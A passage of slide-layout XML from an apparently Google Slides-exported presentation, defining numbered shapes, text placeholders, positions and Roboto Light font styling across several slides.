                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="383" name="Google Shape;383;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4" name="Google Shape;384;p50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32258" y="10328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85" name="Google Shape;385;p50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143181" y="11496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6" name="Google Shape;386;p50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219175" y="11496427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="387" name="Google Shape;387;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08</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="388" name="Google Shape;388;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9" name="Google Shape;389;p50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32192" y="11496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90" name="Google Shape;390;p50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143348" y="7991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1" name="Google Shape;391;p50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219342" y="7991151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="392" name="Google Shape;392;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05</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="393" name="Google Shape;393;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4" name="Google Shape;394;p50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32391" y="7991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95" name="Google Shape;395;p50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143048" y="9159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6" name="Google Shape;396;p50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219042" y="9159427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="397" name="Google Shape;397;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06</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="398" name="Google Shape;398;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9" name="Google Shape;399;p50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32392" y="9159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00" name="Google Shape;400;p50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143415" y="5694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1" name="Google Shape;401;p50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219408" y="5694151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="402" name="Google Shape;402;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03</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="403" name="Google Shape;403;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4" name="Google Shape;404;p50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32324" y="5694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05" name="Google Shape;405;p50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143115" y="6862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6" name="Google Shape;406;p50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219108" y="6862427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="407" name="Google Shape;407;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04</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="408" name="Google Shape;408;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9" name="Google Shape;409;p50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32658" y="6862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10" name="Google Shape;410;p50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143281" y="3357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1" name="Google Shape;411;p50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219275" y="3357151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="412" name="Google Shape;412;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01</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="413" name="Google Shape;413;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4" name="Google Shape;414;p50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="3357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15" name="Google Shape;415;p50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3142981" y="4525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6" name="Google Shape;416;p50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218975" y="4525427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="417" name="Google Shape;417;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02</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="418" name="Google Shape;418;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9" name="Google Shape;419;p50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="4525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20"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Google Shape;421;p51"/>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22" name="Google Shape;422;p51"/>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423" name="Google Shape;423;p51"/>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424" name="Google Shape;424;p5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25" name="Google Shape;425;p51"/>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426" name="Google Shape;42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27" name="Google Shape;427;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143481" y="10328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8" name="Google Shape;428;p51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219475" y="10328151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="429" name="Google Shape;429;p51"/>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07</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="430" name="Google Shape;430;p51"/>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1" name="Google Shape;431;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32257" y="10328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32" name="Google Shape;432;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143181" y="11496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3" name="Google Shape;433;p51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219175" y="11496427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="434" name="Google Shape;434;p51"/>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08</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="435" name="Google Shape;435;p51"/>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6" name="Google Shape;436;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32192" y="11496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37" name="Google Shape;437;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143348" y="7991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8" name="Google Shape;438;p51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219342" y="7991151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="439" name="Google Shape;439;p51"/>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05</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="440" name="Google Shape;440;p51"/>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1" name="Google Shape;441;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32391" y="7991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42" name="Google Shape;442;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143048" y="9159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3" name="Google Shape;443;p51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219042" y="9159427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="444" name="Google Shape;444;p51"/>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06</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="445" name="Google Shape;445;p51"/>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6" name="Google Shape;446;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32392" y="9159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47" name="Google Shape;447;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143415" y="5694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51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219408" y="5694151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="449" name="Google Shape;449;p51"/>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03</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="450" name="Google Shape;450;p51"/>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1" name="Google Shape;451;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="5694333"/>
            <a:ext cx="236465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52" name="Google Shape;452;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143115" y="6862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3" name="Google Shape;453;p51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219108" y="6862427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="454" name="Google Shape;454;p51"/>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04</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="455" name="Google Shape;455;p51"/>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6" name="Google Shape;456;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="6862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57" name="Google Shape;457;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143281" y="3357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8" name="Google Shape;458;p51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219275" y="3357151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="459" name="Google Shape;459;p51"/>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01</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="460" name="Google Shape;460;p51"/>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1" name="Google Shape;461;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="3357333"/>
            <a:ext cx="236465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62" name="Google Shape;462;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3142981" y="4525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3" name="Google Shape;463;p51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218975" y="4525427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="464" name="Google Shape;464;p51"/>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02</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="465" name="Google Shape;465;p51"/>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6" name="Google Shape;466;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4525667"/>
            <a:ext cx="236465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67"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="468" name="Google Shape;468;p52"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11427057" y="3154800"/>
            <a:ext cx="2206013" cy="9764321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="Google Shape;469;p52"/>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2"/>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71" name="Google Shape;471;p52"/>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472" name="Google Shape;472;p52"/>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473" name="Google Shape;473;p5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74" name="Google Shape;474;p52"/>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475" name="Google Shape;475;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76" name="Google Shape;476;p52"/>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endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Google Shape;477;p52"/>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52"/>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79" name="Google Shape;479;p52"/>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80" name="Google Shape;480;p52"/>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1" name="Google Shape;481;p52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13160055" y="3796141"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="482" name="Google Shape;482;p52"/>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endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="483" name="Google Shape;483;p52"/>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4" name="Google Shape;484;p52"/>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85" name="Google Shape;485;p52"/>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86" name="Google Shape;486;p52"/>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marR="0" lvl="0" algn="ctr"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87" name="Google Shape;487;p52"/>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marR="0" lvl="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="5600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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88"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489" name="Google Shape;489;p53"/>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90" name="Google Shape;490;p53"/>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491" name="Google Shape;491;p53"/>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492" name="Google Shape;492;p5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93" name="Google Shape;493;p53"/>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494" name="Google Shape;494;p5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95" name="Google Shape;495;p53"/>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01</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="Google Shape;496;p53"/>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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3021813" y="3404200"/>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53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1218756"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53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2335417" y="5233000"/>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53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="21152891" y="51694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02</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="Google Shape;501;p53"/>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03</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
